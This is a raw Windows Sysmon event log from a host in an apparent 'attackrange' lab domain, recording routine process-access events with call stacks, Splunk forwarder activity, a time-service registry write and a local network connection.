12:09:49.611{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.111{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D6F0BF5B10D188374A65B84FB59F127,SHA256=20A0C136525B99C586942B9EE3C38CDC51F8AFFE12636E19EF9445B70EC2CB76,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:49.017{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0xbf43106d) 354300x800000000000000010959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.334{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53716-false10.0.1.12-8089- 23542300x800000000000000010958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:50.173{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=058A0132EA8D51FAA4D24E84E26B9CDD,SHA256=47DE51DAA200A1D6467D3DAA147DD43E7B0351FD8D4A54A477891B89623598CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.251{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.251{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.235{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.235{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.235{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.235{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immer
siveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
